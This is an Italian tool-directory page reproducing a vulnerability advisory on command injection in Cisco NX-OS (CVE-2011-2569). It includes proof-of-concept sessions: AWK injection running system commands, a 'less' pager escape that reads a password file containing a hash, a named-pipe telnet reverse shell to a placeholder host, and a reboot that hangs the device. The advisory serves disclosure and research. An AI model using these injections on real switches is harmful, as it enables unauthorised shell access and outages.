Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
secpub — Vulnerabilità di sicurezza pubblicate, ricerche e informazioni correlate. | Kitploit
Strumenti/GitHubGitHub/darkarnium/secpub
Sicurezza Sistemi EmbeddedEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingPaper e RicercaApprendimento e FormazioneRisorse Curate
GitHubdarkarnium/secpub

secpub

Vulnerabilità di sicurezza pubblicate, ricerche e informazioni correlate.

138296 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Cisco Nexus OS (NX-OS) - Problemi di "command injection" / sanificazione dei comandi.

Scoperto da:
  • Peter Adkins [email protected]
Accesso:
  • Locale; è richiesto accesso autenticato.
Tracciamento e identificativi:
  • CVE - CVE-2011-2569
Sistemi operativi interessati:
  • Cisco Nexus OS (NX-OS)
Coinvolgimento del fornitore:
  • Avvisato - patch disponibili / implementate per alcune piattaforme.
Sistemi / piattaforme interessati:
  • Nexus 7000
  • Nexus 5000
  • Nexus 4000
  • Nexus 3000
  • Nexus 2000
  • Nexus 1000V
  • MDS
  • UCS
Note:

È richiesto accesso locale. Tuttavia, gli account non privilegiati possono ottenere accesso al sistema operativo Linux sottostante, fornendo di fatto accesso completo al dispositivo. Questo potrebbe potenzialmente portare a problemi in ambienti in cui al personale NOC e ad altro personale è consentito un accesso di basso livello come primo punto di contatto, ecc.

NX-OS - Sottocomando "section" - Problemi di "command injection" / sanificazione dei comandi.

Questo problema è stato trovato sulla piattaforma Nexus 7000. Si ritiene che interessi anche le seguenti piattaforme:

  • Nexus 7000 ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )
  • Nexus 5000 ( OS < UNK )
  • Nexus 4000 ( OS < UNK )
  • Nexus 3000 ( OS < UNK )
  • Nexus 2000 ( OS < UNK )
  • MDS ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )

Il comando section sembra essere uno script AWK a cui viene passata la stringa richiesta. Tuttavia, l'input non sembra essere sanificato correttamente. Di conseguenza, AWK può essere utilizzato per eseguire comandi arbitrari sul sottosistema Linux.

root@kitploit:~
nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"id"\) \}/' > 20110713.awk
Warning: There is already a file existing with this name. Do you want to
overwrite (yes/no)? [no] y

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
uid=2003(user) gid=504(network-operator)
11:16:04.082 UTC Wed Jul 13 2011

nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"ls \/mnt\/cfg\/0\/"\) \}/' > 20110713.awk

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
ascii
bin
boot
cfglabel.sysmgr
debug
licenses
linux
log
lost+found
11:18:41.885 UTC Wed Jul 13 2011

Questo può essere utilizzato anche per rimuovere tutti i file dalla bootflash ed eseguire un comando 'reboot' sul sistema. Tuttavia, il riavvio dal sottosistema Linux fa sì che il dispositivo emetta messaggi sulla console e si blocchi; piuttosto che ricaricare effettivamente il dispositivo.

NX-OS - Sottocomando "less" - Problemi di "command injection" / sanificazione dei comandi.

Si ritiene che interessi le seguenti versioni del software:

  • Nexus 7000 ( OS < 5.1(1) )
  • Nexus 5000 ( OS < 4.2(1)N2(1) )
  • Nexus 4000 ( OS < UNK)
  • Nexus 2000 ( OS < 4.2(1)N2(1) )
  • UCS ( OS < 1.4(1i) 1.3(1c) )
    • Sulla piattaforma UCS i comandi iniettati vengono eseguiti come root.
  • Nexus 1000V ( OS < UNK )
  • MDS ( OS < 5.1(1) )

Ad esempio:

root@kitploit:~
switch# sh clock | less

Una volta visualizzato less, apriamo i file premendo i due punti e poi "e" e specificando il percorso del file.

root@kitploit:~
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Tuttavia, anche questo è solo accesso in sola lettura. MA, se usiamo il tasto "|" (pipe) e poi la macro di tasto "$", possiamo eseguire comandi.

root@kitploit:~
!ls -lah > /bootflash/20110715

Come mostrato di seguito, il file è stato creato nella boot-flash.

root@kitploit:~
switch# dir
      97     Jul 15 12:01:44 2011  20110715

Usando questo metodo, sono stato in grado di stabilire una shell remota nel sottosistema Linux di NX-OS usando quanto segue:

root@kitploit:~
 mknod rs p; telnet ad.dr.es.s 8888 0<rs | /bin/bash 1>rs

Anche il comando reboot viene accettato come input valido. Tuttavia, piuttosto che riavviare il dispositivo, fa sì che il sistema si blocchi mentre emette errori sulla console.

root@kitploit:~
 switch# sh clock | less
 Fri Jul 15 12:06:30 UTC 2011
 !reboot

 Broadcast message from root (Fri Jul 15 12:06:39 2011):
Scarica lo strumento